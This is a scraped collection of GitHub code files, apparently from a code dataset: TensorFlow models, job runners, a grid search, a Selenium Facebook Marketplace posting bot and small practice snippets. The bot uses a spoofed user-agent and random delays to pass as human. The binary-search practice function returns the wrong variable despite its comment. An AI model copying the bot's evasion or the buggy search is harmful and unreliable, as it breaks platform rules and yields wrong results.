\"forehead_width_cm\", \"forehead_height_cm\", \"nose_wide\", \"nose_long\",\"lips_thin\", \"distance_nose_to_lip_long\"]]\n y = dataset[[\"gender\"]]\n \n return x,y\n\ndef preprocess_data(features, target):\n features = MinMaxScaler().fit_transform(features)\n target = OneHotEncoder(sparse=False).fit_transform(target)\n \n return features, target\n\nlayers = {\n 'input': 7,\n 'hidden': 7,\n 'output': 2\n }\n\nweight = {\n 'hidden': tf.Variable(tf.random.normal([layers['input'], layers['hidden']])),\n 'output': tf.Variable(tf.random.normal([layers['hidden'], layers['output']]))\n }\n\nbias = {\n 'hidden': tf.Variable(tf.random.normal([layers['hidden']])),\n 'output': tf.Variable(tf.random.normal([layers['output']]))\n }\n\ndef activate(x):\n return tf.nn.sigmoid(x)\n\ndef foward_pass(features):\n x1 = tf.matmul(features, weight['hidden']) + bias['hidden']\n y1 = activate(x1)\n \n x2 = tf.matmul(y1, weight['output']) + bias['output']\n y2 = activate(x2)\n \n return y2\n\nfeatures_temp = tf.placeholder(tf.float32, [None, layers['hidden']])\ntarget_temp = tf.placeholder(tf.float32, [None, layers['output']])\n\noutput = foward_pass(features_temp)\nerror = tf.reduce_mean(0.5 * (target_temp - output) ** 2)\n\nLearning_rate = 0.1\nepoch = 5000 \ntraining = tf.train.GradientDescentOptimizer(0.1).minimize(error)\n\nfeatures, target = import_data()\nfeatures, target = preprocess_data(features, target)\n\nfeatures_train, features_test, target_train, target_test = train_test_split(features, target, test_size = 0.2)\n\nwith tf.Session() as sess:\n 
sess.run(tf.global_variables_initializer())\n \n for i in range(epoch+1):\n train_data = {\n features_temp : features_train,\n target_temp : target_train\n }\n sess.run(training, feed_dict = train_data)\n curr_error = sess.run(error, feed_dict = train_data)\n \n if i % 200 == 0:\n print(f\"epoch: {i}, Current Error = {curr_error}\")\n \n accuracy = tf.equal(tf.argmax(target_temp, axis = 1), tf.argmax(output, axis = 1))\n test_data = {\n features_temp : features_test,\n target_temp: target_test\n }\n result = tf.reduce_mean(tf.cast(accuracy, tf.float32))\n print(f\"Accuracy = {sess.run(result, feed_dict = test_data) * 100}%\")","repo_name":"kevinsamandaria/GenderClassificatoin","sub_path":"Code.py","file_name":"Code.py","file_ext":"py","file_size_in_byte":2658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"73980119250","text":"\"\"\"\nGiven a sorted array arr of distinct integers, write a function indexEqualsValueSearch that returns the \nlowest index i for which arr[i] == i. \nReturn -1 if there is no such index. \nAnalyze the time and space complexities of your solution and explain its correctness.\n\nExamples:\n\ninput: arr = [-8,0,2,5]\noutput: 2 # since arr[2] == 2\n\ninput: arr = [-1,0,3,6]\noutput: -1 # since no index in arr satisfies arr[i]\n\"\"\"\n#trick is to find the lowest index. bruteforce - loop all elements and check for first match (since it's already sorted)\n#Improved - binary search\n\ndef arrIdx(nums):\n s , h = 0, len(nums) - 1\n midIdx = float('inf')\n while(s <= h):\n mid = (s+h)//2\n if(nums[mid] == mid):\n midIdx = min(midIdx, mid)\n h = mid - 1 #hence we move towards left once we found a match to see if there are matches before\n elif(nums[mid] > mid):\n h = mid - 1\n else:\n s = mid + 1\n return -1 if midIdx == float('inf') else mid\nnums = [0,1,2,3,4,5,6,7,8] # in this example it matches 4 first, but we also have 0\nprint(arrIdx(nums))\n","repo_name":"Gowthami03B/practiceProblems","sub_path":"arrIdxPramp.py","file_name":"arrIdxPramp.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"35706601764","text":"import os\r\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\r\nimport tensorflow as tf\r\nold_v = tf.logging.get_verbosity()\r\ntf.logging.set_verbosity(tf.logging.ERROR)\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nmodel_dir = os.path.join(os.getcwd(), \"model\")\r\nif not os.path.exists(model_dir):\r\n\tos.makedirs(model_dir)\r\n\tpass\r\n\r\n# dataset\r\nfrom tensorflow.examples.tutorials.mnist import input_data\r\nmnist = input_data.read_data_sets('/tmp/data', one_hot=True)\r\n\r\nn_pixels = 28*28\r\n\r\nX = tf.placeholder(tf.float32, shape=([None, n_pixels]))\r\n\r\n\r\ndef weight_variables(shape, name):\r\n\tinitial = tf.truncated_normal(shape, stddev=0.1)\r\n\treturn tf.Variable(initial, name = name)\r\n\r\ndef bias_variable(shape, name):\r\n\tinitial = tf.truncated_normal(shape, stddev=0.1)\r\n\treturn tf.Variable(initial, name=name)\r\n\r\ndef FC_layer(x, w, b):\r\n\treturn tf.matmul(x, w) + b\r\n\r\nlatent_dim = 20\r\nh_dim = 500\r\n# Encoder -----------------------------------------------------------------------------------------\r\n# layer 1\r\nW_enc = weight_variables([n_pixels, h_dim], 'W_enc')\r\nb_enc = bias_variable([h_dim], 'b_enc')\r\n# tanh activation\r\nh_enc = tf.nn.tanh(FC_layer(X, W_enc, b_enc))\r\n\r\n# layer 2\r\nW_mu = weight_variables([h_dim, latent_dim], 
'W_mu')\r\nb_mu = bias_variable([latent_dim], 'b_mu')\r\nmu = FC_layer(h_enc, W_mu, b_mu) # mean\r\n\r\n# standard deviation\r\nW_logstd = weight_variables([h_dim, latent_dim], 'W_logstd')\r\nb_logstd = bias_variable([latent_dim], 'b_logstd')\r\nlogstd = FC_layer(h_enc, W_logstd, b_logstd) # std\r\n\r\n# RANDOMNESSSSSSSSSSSSSssss\r\nnoise = tf.random_normal([1, latent_dim])\r\n\r\n# z is the ultimate output of our encoder\r\nz = mu + tf.multiply(noise, tf.exp(.5 * logstd))\r\n# Encoder -----------------------------------------------------------------------------------------\r\n#Z = tf.placeholder(tf.float32, shape=([None, latent_dim]))\r\n# Decoder -----------------------------------------------------------------------------------------\r\n\r\n# layer 1\r\nW_dec = weight_variables([latent_dim, h_dim], 'W_dec')\r\nb_dec = bias_variable([h_dim], 'b_dec')\r\nh_dec = tf.nn.tanh(FC_layer(z, W_dec, b_dec))\r\n\r\n\r\n# layer 2\r\nW_reconstruct = weight_variables([h_dim, n_pixels], 'W_reconstruct')\r\nb_reconstruct = bias_variable([n_pixels], 'b_reconstruct')\r\n\r\nreconstruction = tf.nn.sigmoid(FC_layer(h_dec, W_reconstruct, b_reconstruct))\r\n\r\n# Decoder -----------------------------------------------------------------------------------------\r\n\r\n# Loss Function\r\nlog_likelihood = tf.reduce_sum(X * tf.log(reconstruction + 1e-9) + (1 - X) * tf.log(1 - reconstruction + 1e-9), reduction_indices= 1)\r\n\r\n# KL Divergence\r\nKL_tern = -.5 * tf.reduce_sum(1 + 2 * logstd - tf.pow(mu, 2) - tf.exp(2 * logstd), reduction_indices= 1)\r\n\r\nvariational_lower_bound = tf.reduce_mean(log_likelihood - KL_tern)\r\noptimizer = tf.train.AdadeltaOptimizer().minimize( - variational_lower_bound)\r\n\r\nsaver = tf.train.Saver()\r\ninit = tf.global_variables_initializer()\r\nsess = tf.InteractiveSession()\r\nsess.run(init)\r\nsaver.restore(sess, os.path.join(model_dir, \"autoencoder_model.ckpt\"))\r\n\r\nload_model = False\r\nif load_model:\r\n\tsaver.restore(sess, os.path.join(model_dir, \"autoencoder_model.ckpt\"))\r\n\r\nnum_pair = 10\r\nimage_indices = np.random.randint(0, 200, num_pair)\r\nfor pair in range(num_pair):\r\n\tx = np.reshape(mnist.test.images[image_indices[pair]], (1, n_pixels))\r\n\tplt.figure()\r\n\tx_image = np.reshape(x, (28, 28))\r\n\tplt.subplot(121)\r\n\tplt.imshow(x_image)\r\n\r\n\tx_reconstruction = reconstruction.eval(feed_dict= {X:x})\r\n\r\n\tx_reconstruction_image = (np.reshape(x_reconstruction, (28, 28)))\r\n\r\n\tplt.subplot(122)\r\n\tplt.imshow(x_reconstruction_image)\r\nplt.show()","repo_name":"li195111/Autoencoder-test","sub_path":"Load_Autoencoder.py","file_name":"Load_Autoencoder.py","file_ext":"py","file_size_in_byte":3616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"9849463656","text":"\"\"\"Definition of all runner classes.\"\"\"\n\nimport multiprocessing\nimport os\nfrom abc import ABC, abstractmethod\nfrom .utilities import start_process, get_gpu_count\n\n\nclass AbstractRunner(ABC):\n \"\"\"Abstract runner class.\n\n Parameters\n ----------\n num_threads: int, optional\n Number of threads to use.\n use_gpu: bool, optional\n Flag to indicate GPU usage.\n wall_time: int, optional\n Required time, in minutes, to run the process.\n memory: int, optional\n Required memory, in MB, to run run the process.\n\n \"\"\"\n\n def __init__(self, num_threads=1, use_gpu=False, wall_time=None, memory=None):\n self.num_workers = multiprocessing.cpu_count() // num_threads\n self.num_threads = num_threads\n self.num_gpu 
= get_gpu_count()\n self.gpu_idx = 0\n self.use_gpu = use_gpu\n self.wall_time = wall_time\n self.memory = memory\n\n @abstractmethod\n def run(self, cmd_list):\n \"\"\"Run commands in list.\n\n Parameters\n ----------\n cmd_list: list\n\n \"\"\"\n raise NotImplementedError\n\n def _add_device(self, cmd):\n \"\"\"Add device keyword to a command.\"\"\"\n if self.num_gpu == 0 or (not self.use_gpu):\n cmd += ' --device cpu'\n else:\n cmd += ' --device cuda:{}'.format(self.gpu_idx)\n self.gpu_idx = (self.gpu_idx + 1) % self.num_gpu\n\n return cmd\n\n\nclass LeonhardRunner(AbstractRunner):\n \"\"\"Runner in Leonhard Cluster.\"\"\"\n\n def run(self, cmd_list):\n \"\"\"See `AbstractRunner.run'.\"\"\"\n tasks = cmd_list[:]\n try:\n os.makedirs('logs/')\n except FileExistsError:\n pass\n\n for cmd in tasks:\n bsub_cmd = 'bsub '\n\n config_file = cmd.split('config-file ')[1].split('/config.yaml')[0]\n config_file = config_file.replace('/', '_')\n bsub_cmd += '-oo {} '.format('logs/lsf.{}'.format(config_file))\n\n if self.wall_time is not None:\n bsub_cmd += '-W {} '.format(self.wall_time)\n if self.memory is not None:\n bsub_cmd += '-R \"rusage[mem={}]\" '.format(self.memory)\n if self.use_gpu:\n bsub_cmd += '-R \"rusage[ngpus_excl_p=1]\" '\n\n bsub_cmd += '-n {} '.format(self.num_threads)\n os.system(bsub_cmd + '\"{}\" &'.format(cmd))\n\n\nclass SingleRunner(AbstractRunner):\n \"\"\"Runner in a Single Machine.\"\"\"\n\n def run(self, cmd_list):\n \"\"\"See `AbstractRunner.run'.\"\"\"\n workers_idle = [False] * self.num_workers\n pool = [start_process(lambda: None) for _ in range(self.num_workers)]\n tasks = cmd_list[:]\n\n while not all(workers_idle):\n for i in range(self.num_workers):\n if not pool[i].is_alive():\n pool[i].terminate()\n if len(tasks) > 0:\n cmd = self._add_device(tasks.pop(0))\n pool[i] = start_process(lambda x: os.system(x), (cmd,))\n else:\n workers_idle[i] = True\n","repo_name":"sebascuri/GPSSMtorch","sub_path":"gpssm/runner/runners.py","file_name":"runners.py","file_ext":"py","file_size_in_byte":3103,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"18791464740","text":"#!python3.6\nimport sys\nimport re\n\ndef line2command(line):\n m = re.search('\\{.*\\}\\{', line)\n cmd = m.group()[2:-2]\n m = re.search('\\}\\{.*\\}\\n', line)\n text = m.group()[2:-2]\n return [cmd, text]\n\ndef plain2latex(line, cmds):\n tmp = line\n for cmd in cmds:\n tmp = re.sub(\" \"+cmd[1]+\" \", \"~\\\\\"+cmd[0]+\"~\", tmp)\n tmp = re.sub(\" \"+cmd[1]+\",\", \"~\\\\\"+cmd[0]+\",\", tmp)\n tmp = re.sub(\" \"+cmd[1]+\"\\.\", \"~\\\\\"+cmd[0]+\".\", tmp)\n return tmp\n\nif __name__ == '__main__':\n args = sys.argv\n path = args[1]\n with open(path) as f:\n l = f.readlines()\n \n commands = [i for i in l if \"\\\\newcommand\" in i and \"[1]\" not in i]\n cmds = [line2command(i) for i in commands]\n\n output = \"\" \n for line in l:\n output += plain2latex(line, cmds)\n\n with open(path[:-4]+\".fixed.tex\", mode='w') as f:\n f.write(output)\n\n\n","repo_name":"chike0905/tex2plaintxt","sub_path":"plain2latex.py","file_name":"plain2latex.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"24067299943","text":"import argparse\nimport logging\nfrom itertools import product\nimport functools\n\nimport pyMetaLearn.optimizers.optimizer_base as optimizer_base\n\n\nlogging.basicConfig(format='[%(levelname)s] [%(asctime)s:%(name)s] %('\n 'message)s', 
datefmt='%H:%M:%S')\nlogger = logging.getLogger(\"Gridsearch\")\nlogger.setLevel(logging.INFO)\n\n\ndef parse_parameters(args=None):\n parser = argparse.ArgumentParser()\n group = parser.add_mutually_exclusive_group(required=True)\n group.add_argument(\"-a\", \"--algorithm\")\n group.add_argument(\"--cli_target\")\n parser.add_argument(\"-p\", \"--params\", required=True)\n args = parser.parse_args(args=args)\n return args\n\n\ndef perform_gridsearch(fn, grid):\n retvals = []\n for idx, parameters in enumerate(grid):\n logger.info(\"%d/%d, parameters: %s\\n\" % (idx+1, len(grid),\n str(parameters)))\n retvals.append(fn(parameters))\n logger.info(\"Response: \" + str(retvals[-1]))\n return min(retvals)\n\n\ndef main(args=None):\n args = parse_parameters()\n fh = open(args.params)\n param_string = fh.read()\n fh.close()\n hyperparameters = optimizer_base.parse_hyperparameter_string(param_string)\n grid = optimizer_base.build_grid(hyperparameters)\n if args.algorithm:\n raise NotImplementedError()\n elif args.cli_target:\n cli_function = optimizer_base.command_line_function()\n fn = functools.partial(cli_function, args.cli_target)\n #print perform_gridsearch(fn, grid)\n perform_gridsearch(fn, grid)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"liamcli/pyMetaLearn","sub_path":"pyMetaLearn/optimizers/gridsearch/gridsearch/gridsearch.py","file_name":"gridsearch.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"9032669363","text":"import time\nimport random\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import TimeoutException\nimport sys\nimport json\nfrom openpyxl import load_workbook\n\n\ndef sleep_time():\n time.sleep(random.uniform(5, 10))\n\n\nclass BotFacebookMarketplace:\n def __init__(self, excel, email, password):\n self.excel = excel\n self.email = email\n self.password = password\n\n opts = Options()\n opts.add_argument(\n \"user-agent=Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/71.0.3578.80 Chrome/71.0.3578.80 Safari/537.36\")\n\n if sys.platform == \"win32\":\n self.driver = webdriver.Chrome('./chromedriver.exe', options=opts)\n else:\n self.driver = webdriver.Chrome('./chromedriver', options=opts)\n self.driver.maximize_window()\n\n self.get_access_facebook()\n sleep_time()\n self.iterate_excel()\n\n def change_page(self, url):\n self.driver.get(url)\n sleep_time()\n\n def get_access_facebook(self):\n self.change_page(\"https://www.facebook.com\")\n email_input = WebDriverWait(self.driver, 5).until(EC.presence_of_element_located((By.ID, \"email\")))\n email_input.send_keys(self.email)\n sleep_time()\n password_input = WebDriverWait(self.driver, 5).until(EC.presence_of_element_located((By.ID, \"pass\")))\n password_input.send_keys(self.password)\n sleep_time()\n login_button = WebDriverWait(self.driver, 5).until(\n EC.element_to_be_clickable((By.XPATH, \"//*[@type='submit']\")))\n login_button.click()\n\n def select_category(self, category):\n with open('./data/category.json', encoding=\"utf8\") as r:\n data = json.loads(r.read())\n data_category = data[int(category)]\n category_label = data_category['category']\n\n try:\n category_input = WebDriverWait(self.driver, random.uniform(8, 
15)).until(EC.presence_of_element_located(\n (By.XPATH, \"//label[@aria-label='Categoría']\")))\n category_input.click()\n sleep_time()\n category_option = WebDriverWait(self.driver, random.uniform(8, 15)).until(EC.presence_of_element_located(\n (By.XPATH, f\"//*[text() ='{category_label}']/ancestor::div[@role='button']\")))\n category_option.click()\n sleep_time()\n except TimeoutException:\n category_input = WebDriverWait(self.driver, random.uniform(7, 15)).until(EC.presence_of_element_located(\n (By.XPATH, \"//label[@aria-label='Categoría']\")))\n category_input.click()\n sleep_time()\n category_option = WebDriverWait(self.driver, random.uniform(8, 15)).until(EC.presence_of_element_located(\n (By.XPATH, f\"//*[text() ='{category_label}']/ancestor::div[@role='button']\")))\n category_option.click()\n sleep_time()\n\n def send_text_data(self, title, price, description, sku):\n title_input = WebDriverWait(self.driver, random.uniform(8, 15)).until(EC.presence_of_element_located(\n (By.XPATH, \"//label[@aria-label='Título']/div/div/input\")))\n title_input.send_keys(title)\n\n sleep_time()\n\n price_input = WebDriverWait(self.driver, random.uniform(8, 15)).until(EC.presence_of_element_located(\n (By.XPATH, \"//label[@aria-label='Precio']/div/div/input\")))\n price_input.send_keys(price)\n\n sleep_time()\n\n description_input = WebDriverWait(self.driver, random.uniform(8, 15)).until(EC.presence_of_element_located(\n (By.XPATH, \"//label[@aria-label='Descripción']/div/div/textarea\")))\n description_input.send_keys(description.replace(\"\\r\\n\", \"\\n\"))\n\n sleep_time()\n\n sku_input = WebDriverWait(self.driver, random.uniform(8, 15)).until(EC.presence_of_element_located(\n (By.XPATH, \"//label[@aria-label='SKU']/div/div/input\")))\n sku_input.send_keys(sku)\n\n sleep_time()\n\n def select_state(self):\n state_input = WebDriverWait(self.driver, random.uniform(8, 15)).until(EC.presence_of_element_located(\n (By.XPATH, \"//label[@aria-label='Estado']\")))\n state_input.click()\n sleep_time()\n state_option = WebDriverWait(self.driver, random.uniform(8, 15)).until(EC.presence_of_element_located(\n (By.XPATH, f\"//*[text() ='Nuevo']/ancestor::div[@role='option']\")))\n state_option.click()\n sleep_time()\n\n def select_ubication(self, ubication):\n ubication_input = WebDriverWait(self.driver, random.uniform(8, 15)).until(EC.presence_of_element_located(\n (By.XPATH, \"//input[@aria-label='Ingresa una ciudad']\")))\n ubication_input.clear()\n\n ubication_input.send_keys(ubication)\n\n sleep_time()\n\n ubication_option = WebDriverWait(self.driver, random.uniform(8, 15)).until(EC.presence_of_element_located(\n (By.XPATH, \"//ul[@role='listbox']/li[1]\")))\n ubication_option.click()\n sleep_time()\n\n def upload_images(self, text_images):\n images_input = WebDriverWait(self.driver, random.uniform(8, 15)).until(EC.presence_of_element_located(\n (By.XPATH, \"//input[@accept='image/*,image/heif,image/heic']\")))\n images_input.send_keys(text_images)\n sleep_time()\n\n def iterate_excel(self):\n wb = load_workbook(self.excel)\n ws = wb.active\n\n counter = 0\n success = 0\n\n for rows in ws.iter_rows(min_row=2, min_col=1):\n counter += 1\n\n try:\n sku = rows[0].value if rows[0].value else ''\n category = str(rows[1].value)\n title = rows[2].value\n description = rows[3].value\n price_detail = str(rows[4].value)\n image1 = rows[5].value\n image2 = rows[6].value\n image3 = rows[7].value\n image4 = rows[8].value\n image5 = rows[9].value\n image6 = rows[10].value\n region_detail = str(rows[11].value)\n 
comuna_detail = str(rows[12].value)\n images = (image2, image3, image4, image5, image6)\n except Exception as e:\n print(e)\n sku, category, title, description, price_detail, image1, image2, image3 = None, None, None, None, None, None, None, None\n image4, image5, image6, region_detail, comuna_detail, images = None, None, None, None, None, None\n if image1:\n text_images = image1\n for image in images:\n if image:\n text_images = text_images + ' \\n ' + image\n\n else:\n text_images = ''\n\n if category and title and description and price_detail and region_detail and comuna_detail:\n self.change_page(\"https://www.facebook.com/marketplace/create/item\")\n\n # ---------------------------- SELECT CATEGORY --------------------------------\n self.select_category(category)\n\n # ---------------------------- TITLE - DESCRIPTION - PRICE ----------------------------\n self.send_text_data(title, price_detail, description, sku)\n\n # ---------------------------- REGION - COMUNA ----------------------------\n self.select_ubication(f\"{region_detail}, {comuna_detail}\")\n\n # ---------------------------- IMAGES ----------------------------\n self.upload_images(text_images)\n sleep_time()\n\n self.select_state()\n\n # ---------------------------- NEXT BUTTON ----------------------------\n next_button = WebDriverWait(self.driver, random.uniform(8, 15)).until(EC.presence_of_element_located(\n (By.XPATH, \"//div[@aria-label='Siguiente']\")))\n next_button.click()\n\n sleep_time()\n\n post_button = WebDriverWait(self.driver, random.uniform(8, 15)).until(EC.element_to_be_clickable(\n (By.XPATH, \"//div[@aria-label='Publicar']\")))\n post_button.click()\n sleep_time()\n\n self.driver.quit()\n return counter, success\n","repo_name":"Jose-Miguel7/PRY-20220808-RQT-PUBLICADOR-FACEBOOK","sub_path":"publish.py","file_name":"publish.py","file_ext":"py","file_size_in_byte":8551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"31887705605","text":"#!/usr/bin/env python\nimport sys\nfrom setuptools import setup, find_packages\nfrom setuptools.command.test import test as test_command\nfrom metadata import (\n __name__,\n __version__,\n __long_description__,\n __description__,\n __author__,\n __author_email__,\n)\n\n\nclass PyTest(test_command):\n user_options = [(\"pytest-args=\", \"a\", \"Arguments to pass to py.test\")]\n\n def initialize_options(self):\n test_command.initialize_options(self)\n self.pytest_args = []\n\n def finalize_options(self):\n test_command.finalize_options(self)\n self.test_args = []\n self.test_suite = True\n\n def run_tests(self):\n # import here, cause outside the eggs aren't loaded\n import pytest\n\n # import re\n # if(type(self.pytest_args) == 'str'):\n # args = filter(lambda x: len(x) > 0, re.split(r'\\s+', self.pytest_args))\n # else:\n # args = self.pytest_args\n errno = pytest.main(self.pytest_args)\n sys.exit(errno)\n\n\nsetup(\n name=__name__,\n packages=find_packages(),\n version=__version__,\n description=__description__,\n long_description=__long_description__,\n author=__author__,\n author_email=__author_email__,\n include_package_data=True,\n url=\"\",\n install_requires=[\"paramiko==2.7.1\", \"requests==2.22.0\",\"pyfiglet==0.8.post1\"],\n setup_requires=[\"pytest-runner\"],\n tests_require=[\"pytest\", \"mock\", \"PyHamcrest\", \"pytest-runner\"],\n cmdclass={\"test\": 
PyTest},\n)\n","repo_name":"secxena/credcheck","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"66"} +{"seq_id":"41338463630","text":"import numpy as np\nimport tensorflow as tf\n\nfrom attalos.imgtxt_algorithms.approaches.base import AttalosModel\nfrom attalos.util.transformers.onehot import OneHot\nfrom attalos.imgtxt_algorithms.correlation.correlation import construct_W\nfrom attalos.imgtxt_algorithms.util.negsamp import NegativeSampler\n\nimport attalos.util.log.log as l\nlogger = l.getLogger(__name__)\n\nclass FastZeroTagModel(AttalosModel):\n \"\"\"\n Create a tensorflow graph that finds the principal direction of the target word embeddings \n (with negative sampling), using the loss function from \"Fast Zero-Shot Image Tagging\".\n \"\"\"\n def __init__(self, wv_model, datasets, **kwargs):\n self.wv_model = wv_model\n self.one_hot = OneHot(datasets, valid_vocab=wv_model.vocab)\n word_counts = NegativeSampler.get_wordcount_from_datasets(datasets, self.one_hot)\n self.fast_sample = kwargs.get(\"fast_sample\", False)\n self.negsampler = NegativeSampler(word_counts, self.fast_sample)\n self.w = construct_W(wv_model, self.one_hot.get_key_ordering()).T\n self.learning_rate = kwargs.get(\"learning_rate\", 0.0001)\n self.optim_words = kwargs.get(\"optim_words\", True)\n self.hidden_units = kwargs.get(\"hidden_units\", \"200\")\n self.use_batch_norm = kwargs.get(\"use_batch_norm\",False)\n self.opt_type = kwargs.get(\"opt_type\",\"adam\")\n if self.hidden_units=='0': \n self.hidden_units=[]\n else:\n self.hidden_units = [int(x) for x in self.hidden_units.split(',')]\n self.model_info = dict()\n # Placeholders for data\n self.model_info['input'] = tf.placeholder(shape=(None, datasets[0].img_feat_size), dtype=tf.float32)\n self.model_info[\"pos_vecs\"] = tf.placeholder(dtype=tf.float32)\n self.model_info[\"neg_vecs\"] = tf.placeholder(dtype=tf.float32)\n\n # Construct fully connected layers\n layer = self.model_info['input']\n layers = []\n for i, hidden_size in enumerate(self.hidden_units):\n layer = tf.contrib.layers.relu(layer, hidden_size)\n layers.append(layer)\n if self.use_batch_norm:\n layer = tf.contrib.layers.batch_norm(layer)\n layers.append(layer)\n logger.info(\"Using batch normalization\")\n\n\n # Output layer should always be linear\n layer = tf.contrib.layers.linear(layer, self.w.shape[1])\n layers.append(layer)\n\n self.model_info['layers'] = layers\n self.model_info['prediction'] = layer\n\n \n def fztloss( f, pVecs, nVecs ):\n \"\"\"\n Tensorized cost function from Fast Zero-Shot Learning paper\n\n Args:\n f: The output from the network, a tensor of shape (# images, word embedding size)\n pVecs: The vector embeddings of the ground truth tags, a tensor\n of shape (# images, # positive tags, word embedding size)\n nVecs: The vector embeddings of negatively sampled tags, a tensor\n of shape (# images, # negative samples, word embedding size)\n\n Returns:\n Scalar tensor representing the batch cost\n \"\"\"\n posmul = tf.mul(pVecs, f)\n negmul = tf.mul(nVecs, f)\n\n tfpos = tf.reduce_sum(posmul, reduction_indices=2)\n tfneg = tf.reduce_sum(negmul, reduction_indices=2)\n\n tfpos = tf.transpose(tfpos, [1,0])\n tfneg = tf.transpose(tfneg, [1,0])\n\n negexpan = tf.tile( tf.expand_dims(tfneg, -1), [1, 1, tf.shape(tfpos)[1]] )\n posexpan = tf.tile( tf.transpose(tf.expand_dims(tfpos, -1), [0,2,1]), [1, tf.shape(tfneg)[1], 1])\n differences = 
tf.sub(negexpan, posexpan) \n\n return tf.reduce_sum(tf.reduce_sum(tf.log(1 + tf.exp(differences)), reduction_indices=[1,2]))\n\n loss = fztloss(self.model_info['prediction'], self.model_info['pos_vecs'], self.model_info['neg_vecs'])\n \n self.model_info['loss'] = loss\n if self.opt_type=='sgd':\n optimizer=tf.train.GradientDescent\n else:\n optimizer=tf.train.AdamOptimizer\n self.model_info['optimizer'] = optimizer(learning_rate=self.learning_rate).minimize(loss)\n self.test_one_hot = None\n super(FastZeroTagModel, self).__init__() \n\n\n def predict_feats(self, sess, x):\n return sess.run(self.model_info['prediction'], feed_dict={self.model_info['input']: x})\n\n def _get_ids(self, tag_ids, numSamps=[5, 10], uniform_sampling=False):\n \"\"\"\n Takes a batch worth of text tags and returns positive/negative ids\n \"\"\"\n pos_word_ids = np.ones((len(tag_ids), numSamps[0]), dtype=np.int32)\n pos_word_ids.fill(-1)\n for ind, tags in enumerate(tag_ids):\n if len(tags) > 0:\n pos_word_ids[ind] = np.random.choice(tags, size=numSamps[0])\n \n neg_word_ids = None\n if uniform_sampling:\n neg_word_ids = np.random.randint(0, \n self.one_hot.vocab_size, \n size=(len(tag_ids), numSamps[1]))\n else:\n neg_word_ids = np.ones((len(tag_ids), numSamps[1]), dtype=np.int32)\n neg_word_ids.fill(-1)\n for ind in range(pos_word_ids.shape[0]):\n # TODO: Check to see if this benefits from the same bug as negsampling code\n neg_word_ids[ind] = self.negsampler.negsamp_ind(pos_word_ids[ind], \n numSamps[1])\n \n return pos_word_ids, neg_word_ids\n\n def prep_fit(self, data):\n img_feats, text_feats_list = data\n\n text_feat_ids = []\n for tags in text_feats_list:\n text_feat_ids.append([self.one_hot.get_index(tag) for tag in tags if tag in self.one_hot])\n\n pos_ids, neg_ids = self._get_ids(text_feat_ids)\n \n pvecs = np.zeros((pos_ids.shape[0], pos_ids.shape[1], self.w.shape[1]))\n nvecs = np.zeros((neg_ids.shape[0], neg_ids.shape[1], self.w.shape[1]))\n for i, ids in enumerate(pos_ids):\n pvecs[i] = self.w[ids]\n for i, ids in enumerate(neg_ids):\n nvecs[i] = self.w[ids]\n pvecs = pvecs.transpose((1, 0, 2))\n nvecs = nvecs.transpose((1, 0, 2))\n \n fetches = [self.model_info[\"optimizer\"], self.model_info[\"loss\"]]\n feed_dict = {\n self.model_info[\"input\"]: img_feats,\n self.model_info[\"pos_vecs\"]: pvecs,\n self.model_info[\"neg_vecs\"]: nvecs\n }\n\n return fetches, feed_dict\n \n def prep_predict(self, dataset, cross_eval=False):\n if self.test_one_hot is None or self.test_dataset is dataset:\n self.test_dataset = dataset\n self.test_one_hot = OneHot([dataset], valid_vocab=self.wv_model.vocab)\n self.test_w = construct_W(self.wv_model, self.test_one_hot.get_key_ordering()).T\n \n\n x = []\n y = []\n for idx in dataset:\n image_feats, text_feats = dataset.get_index(idx)\n text_feats = self.test_one_hot.get_multiple(text_feats)\n x.append(image_feats)\n y.append(text_feats)\n x = np.asarray(x)\n y = np.asarray(y)\n\n fetches = [self.model_info[\"prediction\"], ]\n feed_dict = {\n self.model_info[\"input\"]: x\n }\n truth = y\n return fetches, feed_dict, truth\n\n def post_predict(self, predict_fetches, cross_eval=False):\n predictions = predict_fetches[0]\n if cross_eval and self.test_w is None:\n raise Exception(\"test_w is not set. 
Did you call prep_predict?\")\n predictions = np.dot(predictions, self.test_w.T)\n return predictions\n def get_training_loss(self, fit_fetches):\n return fit_fetches[1]\n","repo_name":"Lab41/attalos","sub_path":"attalos/imgtxt_algorithms/approaches/fast0tag.py","file_name":"fast0tag.py","file_ext":"py","file_size_in_byte":7994,"program_lang":"python","lang":"en","doc_type":"code","stars":89,"dataset":"github-code","pt":"66"} +{"seq_id":"5063870193","text":"# ------------------------------------------------------------------------------\n# 組み合わせ(Compination, nCr)\n# ------------------------------------------------------------------------------\n# 解説\n# - 組み合わせの総数を出力。\n# \n# リンク\n# - \n# \n# 計算量\n# - O(log(r))以下程度(概算)\n# - https://qiita.com/ageprocpp/items/f6661deaa09dda124132\n# \n# verify\n# - https://atcoder.jp/contests/abc185/tasks/abc185_c\n# - https://atcoder.jp/contests/abc034/tasks/abc034_c\n# ------------------------------------------------------------------------------\n# 階乗の逆元の前処理をしてMODとる場合は->次のCombunationクラスへ\ndef cmb(n: int, r: int, mod: int= 1):\n if n - r < r: r = n - r\n if r == 0: return 1\n if r 